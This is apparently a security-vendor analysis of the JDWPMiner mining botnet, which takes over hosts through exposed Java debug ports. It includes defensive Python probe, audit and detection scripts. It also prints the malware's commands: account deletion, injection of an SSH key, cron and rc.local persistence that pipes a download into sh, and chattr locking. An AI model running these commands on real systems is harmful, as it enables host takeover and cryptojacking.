Analysis of JDWPMiner Mining Trojan: Remote Debugging with Java Causes Hidden Risks


Recently, the Alibaba Cloud Security Team detected a malicious mining campaign that gains remote code execution (RCE) through exposed JDWP debug ports. JDWP is widely used in the development and debugging of Java applications, and Java itself is widely used to build e-commerce, office, CMS, and other platforms closely tied to daily life. If remote debugging is left enabled when the software is released, a major hidden risk remains. JDWPMiner exploits exactly this for profitable intrusion.

Alibaba Cloud security experts found that the botnet uses the Java debug RCE to download mining binaries from its malicious download server and start mining. It then persists through crontab, writes the attacker's public key to authorized_keys to obtain remote SSH access, and tries four methods of spawning a reverse shell to take full control of the host, causing serious harm to the victim's assets.

Alibaba Cloud Security continuously monitors this botnet and has found that its spread has increased recently. Users are advised to defend against it.

Means of Spread

Phase Analysis

Protocol Analysis

JDWP is a TCP-based binary packet protocol that communicates through command packets and reply packets. Both kinds share an 11-byte header that begins with a 4-byte length and a 4-byte packet id; the Flags field indicates whether the packet is a command packet (0x00) or a reply packet (0x80). In a command packet the Command Set defines the command category and the following Command byte selects the command; a reply packet carries a 2-byte error code in their place, followed by the reply data.

To enable the protocol on Apache Tomcat, users usually modify the startup script in the bin directory of the installation. There are two transports: dt_shmem denotes local shared-memory debugging (Windows only) and dt_socket denotes socket-based remote debugging.

It can also be enabled on the command line (-Xrunjdwp is the legacy spelling; on current JDKs -agentlib:jdwp= takes the same options):

java -Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=8000 -jar demo.jar

The JDWP protocol carries no authentication. Anyone who can reach the debug port of a Java application can attach a debugger to it and, through it, execute arbitrary code inside the JVM. This is a serious risk for development and O&M, and it is the feature JDWPMiner relies on for profitable intrusion.
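The exchange described above, as an added example that is not part of the original article: the 11-byte command and reply headers are packed with struct, the debugger side performs the handshake and sends VirtualMachine.Version (command set 1, command 1), and a constructed stand-in for the debuggee answers it over a socketpair. probe_host() is the same check as the telnet handshake test in the Verification Methods section, with the version query added so that a port that merely echoes the banner is not mistaken for a JVM. The VM strings returned by the stand-in are made up for the demo.

```python
"""JDWP packet encoding plus a handshake/Version probe, with both sides of the exchange."""
import socket
import struct
import threading

HANDSHAKE = b"JDWP-Handshake"          # 14 ASCII bytes sent by each side before any packet
FLAG_REPLY = 0x80                      # flags bit that marks a reply packet
CMDSET_VM, CMD_VERSION = 1, 1          # VirtualMachine command set, Version command
CMD_HEADER = struct.Struct(">IIBBB")   # length, id, flags, command set, command
REPLY_HEADER = struct.Struct(">IIBH")  # length, id, flags, error code


def build_command(pkt_id, cmd_set, cmd, data=b""):
    """Serialize a command packet; the length field covers the 11-byte header and data."""
    return CMD_HEADER.pack(CMD_HEADER.size + len(data), pkt_id, 0, cmd_set, cmd) + data


def build_reply(pkt_id, error_code=0, data=b""):
    return REPLY_HEADER.pack(REPLY_HEADER.size + len(data), pkt_id, FLAG_REPLY, error_code) + data


def parse_packet(raw):
    """Decode either packet kind; the flags byte decides which header layout applies."""
    length, pkt_id, flags = struct.unpack_from(">IIB", raw, 0)
    if length != len(raw):
        raise ValueError("length field %d does not match %d bytes" % (length, len(raw)))
    if flags & FLAG_REPLY:
        (error,) = struct.unpack_from(">H", raw, 9)
        return {"reply": True, "id": pkt_id, "error": error, "data": raw[11:]}
    return {"reply": False, "id": pkt_id, "cmd_set": raw[9], "cmd": raw[10], "data": raw[11:]}


def jdwp_string(text):
    """JDWP string encoding: 4-byte big-endian length followed by UTF-8 bytes."""
    encoded = text.encode("utf-8")
    return struct.pack(">I", len(encoded)) + encoded


def read_string(buf, offset):
    (n,) = struct.unpack_from(">I", buf, offset)
    return buf[offset + 4:offset + 4 + n].decode("utf-8"), offset + 4 + n


def parse_version_reply(data):
    """VirtualMachine.Version reply: description, jdwpMajor, jdwpMinor, vmVersion, vmName."""
    description, off = read_string(data, 0)
    major, minor = struct.unpack_from(">II", data, off)
    vm_version, off = read_string(data, off + 8)
    vm_name, _ = read_string(data, off)
    return {"description": description, "jdwp_major": major, "jdwp_minor": minor,
            "vm_version": vm_version, "vm_name": vm_name}


def recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed the connection")
        buf += chunk
    return buf


def recv_packet(sock):
    head = recv_exact(sock, 4)
    (length,) = struct.unpack(">I", head)
    return head + recv_exact(sock, length - 4)


def probe(sock, pkt_id=1):
    """Debugger side: VM details if the peer speaks JDWP, else None. No credentials are involved."""
    sock.sendall(HANDSHAKE)
    if recv_exact(sock, len(HANDSHAKE)) != HANDSHAKE:
        return None
    sock.sendall(build_command(pkt_id, CMDSET_VM, CMD_VERSION))
    reply = parse_packet(recv_packet(sock))
    if not reply["reply"] or reply["id"] != pkt_id or reply["error"] != 0:
        return None
    return parse_version_reply(reply["data"])


def probe_host(host, port, timeout=5.0):
    with socket.create_connection((host, port), timeout=timeout) as sock:
        return probe(sock)


def fake_debuggee(sock):
    """Constructed debuggee: answers the handshake and one Version request, then hangs up."""
    try:
        if recv_exact(sock, len(HANDSHAKE)) != HANDSHAKE:
            return
        sock.sendall(HANDSHAKE)
        request = parse_packet(recv_packet(sock))
        if (request["cmd_set"], request["cmd"]) == (CMDSET_VM, CMD_VERSION):
            data = (jdwp_string("Java Debug Wire Protocol (Reference Implementation) version 1.8")
                    + struct.pack(">II", 1, 8) + jdwp_string("1.8.0_292")
                    + jdwp_string("OpenJDK 64-Bit Server VM"))  # sample values for the demo
            sock.sendall(build_reply(request["id"], 0, data))
    finally:
        sock.close()


def run_local_exchange():
    """Drive probe() against fake_debuggee over a socketpair; no network needed."""
    client, server = socket.socketpair()
    worker = threading.Thread(target=fake_debuggee, args=(server,))
    worker.start()
    try:
        return probe(client)
    finally:
        client.close()
        worker.join()


if __name__ == "__main__":
    print(run_local_exchange())
```

Against a real host, probe_host("10.0.0.5", 8000) returns the VM name and version if the port is an open JDWP listener, which is all an attacker needs before sending the invoke-method commands that run code in the JVM.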

Intrusion Analysis

The vulnerable target is a Java process started with the debug port listening on 8000:

java -server -Xms256m -Xmx2048m -XX:MaxPermSize=256m -Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=8000 -jar demo.jar

Through the exposed JDWP port, the attacker executes the following command:


The script tries four ways of spawning a reverse shell: python, perl, nc, and bash. Its C2 server is located in Luxembourg. Once a shell is obtained, the host is fully under JDWPMiner's control.

The next stage is then fetched and executed with wget:

wget -O-

Delete the eth0, eth1, sudev, and system accounts from /etc/passwd and /etc/shadow with sed (none of these are standard system accounts):

sed -i 's/^eth0:.*//' /etc/passwd 2>/dev/null;sed -i 's/^eth0:.*//' /etc/shadow 2>/dev/null;sed -i 's/^eth1:.*//' /etc/passwd 2>/dev/null;sed -i 's/^eth1:.*//' /etc/shadow 2>/dev/null;sed -i 's/^sudev:.*//' /etc/passwd 2>/dev/null;sed -i 's/^sudev:.*//' /etc/shadow 2>/dev/null;sed -i 's/^system:.*//' /etc/passwd 2>/dev/null;sed -i 's/^system:.*//' /etc/shadow 2>/dev/null;

Add the attacker's public key to /root/.ssh/authorized_keys (the grep for Glock makes the step idempotent):

# add ssh key
grep Glock /root/.ssh/authorized_keys || echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDFjxDDMcytBQ+57s//0Fah9YVEosmvKMQXspMBi2G6qyF/v0nIE0OH9NhPkG02c8B+7ickaSJU97+UqPRw53mDbOJyT1BKWNbGPMAsLA/wz45O5wUhf/VFQhTpsKBai86N0uO3hjAPybE7fT/RarD45Ip4FUG1ttSw/Au6t1oLenRSAPegsS5b5vrn7OsGdA1kk8Jdk2FkdHBjIAHJtZsVsNLnE08WoAKQV65YWL6J5mnKjkt6bsViMeGAdjCbfgKNDdAnAqPfDHv3p+xIB8GnYwK8bVk4N9r/p4YgiNO+uURIWH0XMPJkvkyX4xco7w8XkyhXzKzRlvz8doXj4SMZ root@Glock' >> /root/.ssh/authorized_keys;chmod 755 /root /root/.ssh /root/.ssh/authorized_keys 2>/dev/null;chown root:root /root /root/.ssh /root/.ssh/authorized_keys 2>/dev/null;

Persist through crontab; each grep first checks for an existing entry, so the hourly job is added to each file only once:

# Add To Crontab
grep m247 /var/spool/cron/root || echo "0 * * * * wget --quiet -O- 2>/dev/null|sh>/dev/null 2>&1" >> /var/spool/cron/root
grep m247 /var/spool/cron/crontabs/root || echo "0 * * * * wget --quiet -O- 2>/dev/null|sh>/dev/null 2>&1" >> /var/spool/cron/crontabs/root
grep m247 /etc/crontab || echo "0 * * * * root wget --quiet -O- 2>/dev/null|sh>/dev/null 2>&1" >> /etc/crontab
grep m247 /etc/cron.d/0hourly || echo "0 * * * * root wget --quiet -O- 2>/dev/null|sh>/dev/null 2>&1" >> /etc/cron.d/0hourly

Persist through the periodic cron directories; each job file is named 0 and made immutable with chattr +i, so a plain rm fails until the attribute is cleared:

# Add to Cron.d
echo -e '#!/bin/sh\n\nwget --quiet -O- 2>/dev/null|sh>/dev/null 2>&1' > /etc/cron.hourly/0;chmod +x /etc/cron.hourly/0;chattr +i /etc/cron.hourly/0;
echo -e '#!/bin/sh\n\nwget --quiet -O- 2>/dev/null|sh>/dev/null 2>&1' > /etc/cron.daily/0;chmod +x /etc/cron.daily/0;chattr +i /etc/cron.daily/0;
echo -e '#!/bin/sh\n\nwget --quiet -O- 2>/dev/null|sh>/dev/null 2>&1' > /etc/cron.weekly/0;chmod +x /etc/cron.weekly/0;chattr +i /etc/cron.weekly/0;
echo -e '#!/bin/sh\n\nwget --quiet -O- 2>/dev/null|sh>/dev/null 2>&1' > /etc/cron.monthly/0;chmod 777 /etc/cron.monthly/0;chattr +i /etc/cron.monthly/0;

Persist through rc.local, choosing the path by distribution:

if [[ -e /etc/debian_version ]]; then
  RCLOCAL='/etc/rc.local';echo -e '#!/bin/sh\n\nwget --quiet -O- 2>/dev/null|sh>/dev/null 2>&1' > $RCLOCAL; chmod +x $RCLOCAL;
elif [[ -e /etc/centos-release || -e /etc/redhat-release ]]; then
  RCLOCAL='/etc/rc.d/rc.local'
  echo -e '#!/bin/sh\n\nwget --quiet -O- 2>/dev/null|sh>/dev/null 2>&1' > $RCLOCAL; chmod +x $RCLOCAL;chmod +x $RCLOCAL;
else
  echo -e '#!/bin/sh\n\nwget --quiet -O- 2>/dev/null|sh>/dev/null 2>&1' > /etc/rc.local;chmod +x /etc/rc.local;
fi

Download the mining payload with curl, falling back to wget:

curl -s || wget --quiet -O /dev/null
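The persistence steps above, seen from the defender's side. The following audit script is an added example (not part of the article or of the malware) that checks exactly the locations the script writes to: the four crontab files, the periodic job files named 0, rc.local, and /root/.ssh/authorized_keys. The path and marker strings come from the commands quoted above; the staged sample tree, including the truncated key line, is constructed for the demo and is not a real infection. Because the periodic job files are set immutable with chattr +i, the finding reminds you to run chattr -i before rm.

```python
"""Audit a Linux host for the persistence left behind by the JDWPMiner script."""
import os
import re
import subprocess
import tempfile

# Indicators taken from the commands quoted above
KEY_COMMENT = "root@Glock"
DOWNLOAD_PIPE = re.compile(r"wget\s+--quiet\s+-O-.*\|\s*sh\b")

CRON_TABLES = ["var/spool/cron/root", "var/spool/cron/crontabs/root",
               "etc/crontab", "etc/cron.d/0hourly"]
PERIODIC_JOBS = ["etc/cron.hourly/0", "etc/cron.daily/0",
                 "etc/cron.weekly/0", "etc/cron.monthly/0"]
RC_LOCAL = ["etc/rc.local", "etc/rc.d/rc.local"]
AUTHORIZED_KEYS = "root/.ssh/authorized_keys"


def _read(path):
    try:
        with open(path, encoding="utf-8", errors="replace") as fh:
            return fh.read()
    except OSError:
        return None


def is_immutable(path):
    """True if lsattr shows the immutable flag (chattr +i); None if it cannot be determined."""
    try:
        result = subprocess.run(["lsattr", "-d", path], capture_output=True, text=True, check=False)
    except FileNotFoundError:
        return None
    fields = result.stdout.split()
    if result.returncode != 0 or not fields:
        return None
    return "i" in fields[0]


def audit_host(root="/"):
    """Return (path, reason) findings; `root` may be a staged tree instead of the live /."""
    findings = []
    for rel in CRON_TABLES + RC_LOCAL:
        path = os.path.join(root, rel)
        text = _read(path)
        if text and DOWNLOAD_PIPE.search(text):
            findings.append((path, "download piped into sh"))
    for rel in PERIODIC_JOBS:
        path = os.path.join(root, rel)
        text = _read(path)
        if text is None:
            continue  # a job file named 0 is the indicator; absence is the normal state
        reason = ("periodic job pipes download into sh" if DOWNLOAD_PIPE.search(text)
                  else "unexpected job file named 0")
        if is_immutable(path):
            reason += "; immutable, run chattr -i before removing"
        findings.append((path, reason))
    path = os.path.join(root, AUTHORIZED_KEYS)
    text = _read(path)
    if text and KEY_COMMENT in text:
        findings.append((path, "attacker SSH key (comment " + KEY_COMMENT + ")"))
    return findings


def strip_attacker_keys(authorized_keys_text):
    """authorized_keys content with the attacker's key lines removed; other keys are kept."""
    return "".join(line for line in authorized_keys_text.splitlines(keepends=True)
                   if KEY_COMMENT not in line)


def build_sample_tree():
    """Constructed staged filesystem for a dry run (sample data, not a real infection)."""
    root = tempfile.mkdtemp(prefix="jdwpminer-audit-")
    files = {
        "etc/crontab": "0 * * * * root wget --quiet -O- http://example.invalid/x 2>/dev/null|sh>/dev/null 2>&1\n",
        "etc/cron.d/0hourly": "01 * * * * root run-parts /etc/cron.hourly\n",  # benign, must not be flagged
        "etc/cron.hourly/0": "#!/bin/sh\n\nwget --quiet -O- http://example.invalid/x 2>/dev/null|sh>/dev/null 2>&1\n",
        "root/.ssh/authorized_keys": "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleKeyOnlyForDemo ops@bastion\n"
                                     "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDFjxDD root@Glock\n",
    }
    for rel, content in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    for path, reason in audit_host(build_sample_tree()):
        print(path, "->", reason)
```

On a live host run audit_host() as root; remove the cron entries and periodic job files it reports (clearing the immutable flag first), rewrite authorized_keys with strip_attacker_keys(), and only then kill the miner, otherwise the hourly job reinstalls it.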

Security Recommendations

Verification Methods

  • Local check: Run the following command. If any line is returned, a Java process has a debug port enabled.
ps -ef | grep jdwp | grep -v 'grep'
  • Remote check: Connect to the port with telnet and send the string JDWP-Handshake. If JDWP-Handshake is echoed back, the port speaks JDWP and the vulnerability exists.
{ echo "JDWP-Handshake"; sleep 20; } | telnet remote_host remote_port


  1. Search the startup scripts for the line containing transport=dt_socket and comment it out.
  2. If running in Docker, change ENV JPDA_ENABLE=1 to ENV JPDA_ENABLE=0 in the Dockerfile.
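A stronger form of the local check, as an added example that is not from the article: instead of grepping ps output it reads /proc/<pid>/cmdline, recognises both -Xrunjdwp: and -agentlib:jdwp= (the form current JDKs use), parses the agent options, and states which interfaces the debug port is bound to. The constructed /proc stand-in and its three command lines, one of them the command line from the Intrusion Analysis section, are sample data for the demo. The JDK-dependent default for an address without a host part is the caveat to keep in mind when reading the output: on JDK 8 and earlier, address=8000 listens on every interface; from JDK 9 on it listens on loopback only unless written as address=*:8000.

```python
"""Find JVMs with JDWP enabled by reading /proc and report how the agent is bound."""
import os
import tempfile

JDWP_PREFIXES = ("-Xrunjdwp:", "-agentlib:jdwp=")


def parse_jdwp_options(option_string):
    """'transport=dt_socket,server=y,address=8000' -> {'transport': 'dt_socket', ...}."""
    opts = {}
    for item in option_string.split(","):
        key, sep, value = item.partition("=")
        if sep:
            opts[key.strip()] = value.strip()
    return opts


def assess_exposure(opts):
    """Plain-language verdict on who can reach the debug port."""
    if opts.get("transport") != "dt_socket":
        return "not a socket transport"
    if opts.get("server", "n") != "y":
        return "JVM connects out to a debugger and does not listen"
    host, _, port = opts.get("address", "").rpartition(":")
    port = port or "ephemeral"
    if host in ("*", "0.0.0.0", "[::]"):
        return "listening on all interfaces, port " + port
    if host in ("localhost", "127.0.0.1", "[::1]"):
        return "listening on loopback only, port " + port
    if host:
        return "listening on " + host + ", port " + port
    # No host part: JDK 8 and earlier bind every interface, JDK 9 and later bind loopback unless address=*:port
    return "port " + port + ", bound to all interfaces on JDK 8 and earlier, loopback only on JDK 9 and later"


def jdwp_options_from_cmdline(argv):
    for arg in argv:
        for prefix in JDWP_PREFIXES:
            if arg.startswith(prefix):
                return parse_jdwp_options(arg[len(prefix):])
    return None


def find_jdwp_processes(proc_root="/proc"):
    """Return [{'pid', 'options', 'exposure'}] for every process carrying a JDWP agent option."""
    hits = []
    for entry in sorted(os.listdir(proc_root)):
        if not entry.isdigit():
            continue
        try:
            with open(os.path.join(proc_root, entry, "cmdline"), "rb") as fh:
                argv = [a.decode("utf-8", "replace") for a in fh.read().split(b"\0") if a]
        except OSError:
            continue  # process exited or is not readable
        opts = jdwp_options_from_cmdline(argv)
        if opts is not None:
            hits.append({"pid": int(entry), "options": opts, "exposure": assess_exposure(opts)})
    return hits


def build_sample_proc():
    """Constructed /proc stand-in with three cmdline files (sample data, not real processes)."""
    root = tempfile.mkdtemp(prefix="fake-proc-")
    samples = {
        "1234": ["java", "-server", "-Xms256m", "-Xmx2048m", "-XX:MaxPermSize=256m", "-Xdebug",
                 "-Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=8000", "-jar", "demo.jar"],
        "1235": ["java", "-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=127.0.0.1:5005",
                 "-jar", "app.jar"],
        "1236": ["/usr/sbin/sshd", "-D"],
    }
    for pid, argv in samples.items():
        os.makedirs(os.path.join(root, pid))
        with open(os.path.join(root, pid, "cmdline"), "wb") as fh:
            fh.write(b"\0".join(a.encode() for a in argv) + b"\0")
    return root


if __name__ == "__main__":
    for hit in find_jdwp_processes():
        print(hit["pid"], hit["exposure"])
```

Run it without arguments on a host to list real JVMs; a verdict other than "loopback only" for a production system means the debug port should be removed from the startup options, not merely firewalled.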

Detailed Security Recommendations

2. Disable Java debug mode on production systems.

3. Cloud Firewall uses big-data analysis to monitor newly disclosed RCE vulnerabilities on the Internet in real time. The overall time from RCE disclosure to response is under three hours, which effectively stops customer assets from being attacked through such vulnerabilities. It supports protection from layer 3 to layer 7, covering HTTP protection for websites as well as layer-4 defense for a large number of TCP/UDP protocols. By default, the current version of Cloud Firewall defends against remote command execution through the Java debugging interface.

4. Cloud Firewall's intelligent policies can be customized from historical traffic to provide best-practice attack-surface reduction aligned with the customer's business. Users can minimize the Internet exposure of their assets through one-click delivery or manual selection. This prevents JDWP ports from being inappropriately exposed to the Internet and from being picked up by Internet-wide scanning (cyberspace mapping) engines.


SSH Public Key

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDFjxDDMcytBQ+57s//0Fah9YVEosmvKMQXspMBi2G6qyF/v0nIE0OH9NhPkG02c8B+7ickaSJU97+UqPRw53mDbOJyT1BKWNbGPMAsLA/wz45O5wUhf/VFQhTpsKBai86N0uO3hjAPybE7fT/RarD45Ip4FUG1ttSw/Au6t1oLenRSAPegsS5b5vrn7OsGdA1kk8Jdk2FkdHBjIAHJtZsVsNLnE08WoAKQV65YWL6J5mnKjkt6bsViMeGAdjCbfgKNDdAnAqPfDHv3p+xIB8GnYwK8bVk4N9r/p4YgiNO+uURIWH0XMPJkvkyX4xco7w8XkyhXzKzRlvz8doXj4SMZ root@Glock




Alibaba Tech

First-hand and in-depth information about Alibaba's latest technology → Facebook: "Alibaba Tech". Twitter: "AlibabaTech".